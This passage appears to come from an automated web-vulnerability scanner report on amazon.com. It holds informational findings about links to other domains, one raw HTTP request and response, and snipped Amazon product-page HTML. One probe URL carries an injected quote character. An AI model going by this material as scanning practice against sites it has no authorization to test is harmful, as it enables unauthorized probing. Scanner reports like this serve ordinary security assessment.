  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAS0r-Pb7PXpRVHTTdwALLVghbOoNBw.TF72Ig5FIC0HFlut61mHtvJjSkGsuImGdmSQn-cZ2sB7bMojeaD4QY0Mk8OR5PtpvvXfAdx0Y5AZx0KppK9OStSJRbTTa6Z3g9qTvjpzsiXrjayxgGwte0Eke6KnYKUEdMYotSAn5rEz-1YG3pAz8N.eUfozaSXt-7jlpBi6AbKqWElsCI4YROFPzDP.xbYJGxzj15KkaKahDTc0AON1HzrfQgm4fyiWwVE6MewhasjvBuA6O.i3cqXaeLSqRqnmRiw-1.1V79FMjAqz6474Uq3S5eF2evMuz4MoPAuCbACbiWN.MZ8C-LK63j9sJprj9St1C35.FXKqETsj1oeiG8ECoBqnSBkUWpEHs.vYyhRheFBFff9sYR-x303et1g10QTwnVwqoesYryspyuyWj625JmInfyGnX7LMwATP73mHqupPy0Qu3IqSrc4zQd7-1xJ7ZaPPCK5hXwFwssqmTjpsmHuHedeHVkUh87ofig20cv8EMeoVqjXKJc0AgPMbBsZq-QW-Cwvs6JR8RyYpkhMSCVixv7XzcLGgKMYGBDAwFfVs1QtXevPiI5bf2tseTEpw2KQoTlTHdUci0tQUe-vB-k5cVv3TCclFqra-nfXIHJT371v5tAMmzPWm7DzwZST8eKQtaj5&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">yahoo.com</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALGVSGm7UFdxuWu68HoORrLIuqmXs0YMpRyYcw8fsjjSaj2qaDPp-aInn1GmA8.a0JJgATPsIckf5mZIL-zLYhbHvGN9KflWbA-mlmvpHo36zn.FHToVxPVThK9wT8PYdCPAdjuremYH2doh3.NeZrVSOYchWObIZCmtSJyQKY8mtrkL7tvukdR0ZuuvWcwQ5J2NmoSskL7FfZUAIere3na68e1m3ughtZzxGeECLIfSxMEeWACCmqoeyTZ6pmaW7GK3MQpA0QIlh-6pQetLEQHafOZeaaO7wIYyGURXFW45ga43PCvc4uP6.NB3Y2E3c-RwyE7kG3uPkcbx5m3A5lvBJ5pALAOOKm.sh1fhodkmi8npP4rNCPgCBOXsHmuXK2li0ecM5P7Rq9tSXivDuwQgkMWTZOtvSEAGgK2HU53NrX9Yx.Jk1q0u-Xj6nUdphp3LUNdm6iXpgGLxROmiS04BSHUU4IPUl5y2Gxetj0YN99GFQlGQoACFCwWJSz3CE1fAZh.M19ZOt8CWhcYXagmWzS4oiNlEiDYOKCuoC3Y5W0JJn-jWAjA3193LxGGaqb2HPLat1GQaBY3yMzwwhL41X8w.qrXS1jBOI2ZbJfXR79LcmhWjQssNYVNVFD.zATLOcU2pBY-Oa3WDQnx8mEo3QrWXnuoUmenb8XIbOs2c2L1iQhF5vjcqGVNsyTyFfAcZc8kIUS0DvzwWe7xG5vv8nGNmlRRsOg__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALGVSGm7UFdxuWu68HoORrLIuqmXs0YMpRyYcw8fsjjSaj2qaDPp-aInn1GmA8.a0JJgATPsIckf5mZIL-zLYhbHvGN9KflWbA-mlmvpHo36zn.FHToVxPVThK9wT8PYdCPAdjuremYH2doh3.NeZrVSOYchWObIZCmtSJyQKY8mtrkL7tvukdR0ZuuvWcwQ5J2NmoSskL7FfZUAIere3na68e1m3ughtZzxGeECLIfSxMEeWACCmqoeyTZ6pmaW7GK3MQpA0QIlh-6pQetLEQHafOZeaaO7wIYyGURXFW45ga43PCvc4uP6.NB3Y2E3c-RwyE7kG3uPkcbx5m3A5lvBJ5pALAOOKm.sh1fhodkmi8npP4rNCPgCBOXsHmuXK2li0ecM5P7Rq9tSXivDuwQgkMWTZOtvSEAGgK2HU53NrX9Yx.Jk1q0u-Xj6nUdphp3LUNdm6iXpgGLxROmiS04BSHUU4IPUl5y2Gxetj0YN99GFQlGQoACFCwWJSz3CE1fAZh.M19ZOt8CWhcYXagmWzS4oiNlEiDYOKCuoC3Y5W0JJn-jWAjA3193LxGGaqb2HPLat1GQaBY3yMzwwhL41X8w.qrXS1jBOI2ZbJfXR79LcmhWjQssNYVNVFD.zATLOcU2pBY-Oa3WDQnx8mEo3QrWXnuoUmenb8XIbOs2c2L1iQhF5vjcqGVNsyTyFfAcZc8kIUS0DvzwWe7xG5vv8nGNmlRRsOg__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALGVSGm7UFdxuWu68HoORrLIuqmXs0YMpRyYcw8fsjjSaj2qaDPp-aInn1GmA8.a0JJgATPsIckf5mZIL-zLYhbHvGN9KflWbA-mlmvpHo36zn.FHToVxPVThK9wT8PYdCPAdjuremYH2doh3.NeZrVSOYchWObIZCmtSJyQKY8mtrkL7tvukdR0ZuuvWcwQ5J2NmoSskL7FfZUAIere3na68e1m3ughtZzxGeECLIfSxMEeWACCmqoeyTZ6pmaW7GK3MQpA0QIlh-6pQetLEQHafOZeaaO7wIYyGURXFW45ga43PCvc4uP6.NB3Y2E3c-RwyE7kG3uPkcbx5m3A5lvBJ5pALAOOKm.sh1fhodkmi8npP4rNCPgCBOXsHmuXK2li0ecM5P7Rq9tSXivDuwQgkMWTZOtvSEAGgK2HU53NrX9Yx.Jk1q0u-Xj6nUdphp3LUNdm6iXpgGLxROmiS04BSHUU4IPUl5y2Gxetj0YN99GFQlGQoACFCwWJSz3CE1fAZh.M19ZOt8CWhcYXagmWzS4oiNlEiDYOKCuoC3Y5W0JJn-jWAjA3193LxGGaqb2HPLat1GQaBY3yMzwwhL41X8w.qrXS1jBOI2ZbJfXR79LcmhWjQssNYVNVFD.zATLOcU2pBY-Oa3WDQnx8mEo3QrWXnuoUmenb8XIbOs2c2L1iQhF5vjcqGVNsyTyFfAcZc8kIUS0DvzwWe7xG5vv8nGNmlRRsOg__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.angelicdreamz.com</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHXqlZHU3.7qp5hfMEdPj9rlfXJFavr1hNHNmk7fH5cikHOvZClbY.mrVpbGwM3lO9-XgafQQ6egJUSF48Nrl0B2x2vrG56YUlHWc.OYP8OdoamNrWr3OXhVbO.bVVBJ2J8MPfDKbHAkNn1DM.Uc4CEU0P2PL1uraPJhOJ4M1b5b5FBx8siS2PENAiQs3VmBwRSSf5s8wQaJpywUnTJKT7XiNu-IV0sB-vEK4DSygG7XMt2PZIhuQMEMSU62othtqa1vCm8-Se-ivcB4tYAAPrIiFRasZpoBvzafAqDJqf4fVvftGehF7ekssxceMDBggeJ5S-Gv5G5wua7xNPfRLtDvSRC2F9jm.7ymWto99.M330.DDoe75M8ZHASAbT3wLxnIGjEITuPmVq0tRlfYzSQFWXOhFjyUYrPGSSghKi2FTHRTB97lSjA5kmzhvsXqvaUUSxmolehtE02ikcoLSlaEJ9uw0iTH3w5SD6pihbg2I7IsJHQTCs3P2eqQ9OsreskfL.mSGe0SSE20DFKiw0g_&awt=1&s=" rel="nofollow">Antique <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHXqlZHU3.7qp5hfMEdPj9rlfXJFavr1hNHNmk7fH5cikHOvZClbY.mrVpbGwM3lO9-XgafQQ6egJUSF48Nrl0B2x2vrG56YUlHWc.OYP8OdoamNrWr3OXhVbO.bVVBJ2J8MPfDKbHAkNn1DM.Uc4CEU0P2PL1uraPJhOJ4M1b5b5FBx8siS2PENAiQs3VmBwRSSf5s8wQaJpywUnTJKT7XiNu-IV0sB-vEK4DSygG7XMt2PZIhuQMEMSU62othtqa1vCm8-Se-ivcB4tYAAPrIiFRasZpoBvzafAqDJqf4fVvftGehF7ekssxceMDBggeJ5S-Gv5G5wua7xNPfRLtDvSRC2F9jm.7ymWto99.M330.DDoe75M8ZHASAbT3wLxnIGjEITuPmVq0tRlfYzSQFWXOhFjyUYrPGSSghKi2FTHRTB97lSjA5kmzhvsXqvaUUSxmolehtE02ikcoLSlaEJ9uw0iTH3w5SD6pihbg2I7IsJHQTCs3P2eqQ9OsreskfL.mSGe0SSE20DFKiw0g_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHXqlZHU3.7qp5hfMEdPj9rlfXJFavr1hNHNmk7fH5cikHOvZClbY.mrVpbGwM3lO9-XgafQQ6egJUSF48Nrl0B2x2vrG56YUlHWc.OYP8OdoamNrWr3OXhVbO.bVVBJ2J8MPfDKbHAkNn1DM.Uc4CEU0P2PL1uraPJhOJ4M1b5b5FBx8siS2PENAiQs3VmBwRSSf5s8wQaJpywUnTJKT7XiNu-IV0sB-vEK4DSygG7XMt2PZIhuQMEMSU62othtqa1vCm8-Se-ivcB4tYAAPrIiFRasZpoBvzafAqDJqf4fVvftGehF7ekssxceMDBggeJ5S-Gv5G5wua7xNPfRLtDvSRC2F9jm.7ymWto99.M330.DDoe75M8ZHASAbT3wLxnIGjEITuPmVq0tRlfYzSQFWXOhFjyUYrPGSSghKi2FTHRTB97lSjA5kmzhvsXqvaUUSxmolehtE02ikcoLSlaEJ9uw0iTH3w5SD6pihbg2I7IsJHQTCs3P2eqQ9OsreskfL.mSGe0SSE20DFKiw0g_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.ask.com</a>
...[SNIP]...
<a href="http://www.amazon.com/Barbie-Collector-2010-Holiday-Doll/dp/B0037UT1LY/ref=pd_bxgy_t_img_a"><img src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_SS75_.jpg" width="75" alt="Barbie Collector 2010 Holiday Doll" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-R6589-Barbie-Holiday-Wishes/dp/B0038L88JS/ref=pd_bxgy_t_img_b"><img src="http://ecx.images-amazon.com/images/I/41CPFZJ47lL._SL500_SS100_.jpg" width="75" alt="Barbie Holiday Wishes Doll" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Barbie-Collector-Generations-Dreams-Doll/dp/B001RECPGU/ref=pd_bxgy_t_img_c"><img src="http://ecx.images-amazon.com/images/I/51TWHoafZSL._SL500_SS100_.jpg" width="75" alt="Barbie Collector Generations of Dreams Doll" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51jjsj2wFxL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41CPFZJ47lL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/411F19H8x1L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41f1rr4L%2BML._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51TWHoafZSL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/31hMpHoc2DL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div id="mainItemImageContainer">
<img src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_SY90_.jpg" width="75" alt="" style="padding-left:8px;padding-right:7px" id="mainItemImage" class="product-image" height="90" border="0" />
</div>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-R4205-Barbie-Glam-Convertible/dp/B002MUANJO/ref=acc_glance_t_ai_BST_t_1" title="Barbie Glam Convertible">
<img src="http://ecx.images-amazon.com/images/I/413IWNaJz3L._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Power-Wheels-Barbie-Lil-Quad/dp/B0015KXFB0/ref=acc_glance_t_ai_BST_t_2" title="Power Wheels Barbie Lil' Quad">
<img src="http://ecx.images-amazon.com/images/I/41%2BpLzpausL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-R4186-Barbie-Vacation-House/dp/B002MUANJE/ref=acc_glance_t_ai_BST_t_3" title="Barbie Glam Vacation House">
<img src="http://ecx.images-amazon.com/images/I/51BB1EyyLtL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-R4206-Barbie-Glam-Pool/dp/B002MUANJY/ref=acc_glance_t_ai_BST_t_4" title="Barbie Glam Pool">
<img src="http://ecx.images-amazon.com/images/I/51oxVpLW5YL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-P7617-Barbie-Nikki-Styling/dp/B002PUEFV8/ref=acc_glance_t_ai_BST_t_5" title="Barbie Nikki Styling Head">
<img src="http://ecx.images-amazon.com/images/I/51WHCULPM4L._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-P7615-Barbie-Styling-Head/dp/B002DPVAWW/ref=acc_glance_t_ai_BST_t_6" title="Barbie Styling Head">
<img src="http://ecx.images-amazon.com/images/I/41HxXrCGmlL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51tdfS%2B868L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41CPFZJ47lL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51%2BpSBoabkL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/31hMpHoc2DL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41G5UMbKBhL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/410818FOEqL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/community-teasers/barbie._V192250991_.jpg" width="151" alt="" class="customer-image" height="42" border="0" /> <div class="time-text">
...[SNIP]...
<div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/default_teaser._V192250129_.jpg" width="122" alt="" class="customer-image" height="42" border="0" /> <div class="time-text">
...[SNIP]...
<div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/community-teasers/doll._V192251098_.jpg" width="162" alt="" class="customer-image" height="42" border="0" /> <div class="time-text">
...[SNIP]...
t-I-want/lm/R13998AI7A80VS/ref=cm_lmt_dtpa_f_1_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=listmania-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=496996711&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/51w2-pY%2B9AL._AA60_.jpg" width="60" alt="What I want!" height="60" border="0" /></a>
...[SNIP]...
ish-List/lm/R1BSQFUHQQSETZ/ref=cm_lmt_dtpa_f_2_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=listmania-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=496996711&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/31eKwdL%2BIgL._AA60_.jpg" width="60" alt="Christmas Toys & Gift Wish List 2010: What my 8-year-old girl loves!" height="60" border="0" /></a>
...[SNIP]...
ollection/lm/RHLTSTXERU8OG/ref=cm_lmt_dtpa_f_3_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=listmania-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=496996711&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/41xM31QiwdL._AA60_.jpg" width="60" alt="My Wii Collection" height="60" border="0" /></a>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
tguides/fullview/R16DPIU6QDOOEF/ref=cm_syt_dtpa_f_1_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=sylt-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=498059871&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/51NP8V7GvbL._AA60_.jpg" width="60" alt="know the hot toys of 2010 on kids holiday wishlists" height="60" border="0" /></a>
...[SNIP]...
tguides/fullview/R2NKCTKZYQEXPL/ref=cm_syt_dtpa_f_2_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=sylt-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=498059871&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/51QgCA4XxTL._AA60_.jpg" width="60" alt="Play fun video games with non-gamers" height="60" border="0" /></a>
...[SNIP]...
tguides/fullview/R12EYZNKPS5AE1/ref=cm_syt_dtpa_f_3_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=sylt-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=498059871&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/41o%2Bt3fNSCL._AA60_.jpg" width="60" alt="find a gift for a pre-school princess (3-5 year old girl)" height="60" border="0" /></a>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/188-3953038-0825847"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.552. http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/dvds-used-hd-action-comedy-oscar/b

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b?ie\\x3dUTF8\\x26amp;node\\x3d130\\x22

The response contains the following links to other domains:

http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif

Request

GET /dvds-used-hd-action-comedy-oscar/b?ie\\x3dUTF8\\x26amp;node\\x3d130\\x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:31 GMT
Server: Server
x-amz-id-1: 16EW5BQW11AZWDFMVQHA
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Qeg7qK9cWHEpdHnnmTiGSC1wRqtj6XEToWtQ6OFmxEjbZWy3wk6SI5Qc1aVAaos6
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=175-0879261-2245254; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144

<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...
<a href="/175-0879261-2245254"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif" width="142" height="31" border="0" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif" width="40" height="35" border="0" />
</td>
...[SNIP]...
<br />
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />
<b>
...[SNIP]...

20.553. http://www.amazon.com/gp/product/0596804946 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/0596804946

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/0596804946?ie=UTF8&tag=severdia-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0596804946

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/41je00SqqhL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/41je00SqqhL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/41nA+5xP9aL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51+j7YLtawL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51-3onLAtSL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51-3onLAtSL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51ERW1EpDfL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51J3zzq8r3L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51J3zzq8r3L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51wRgcBVifL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51wRgcBVifL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
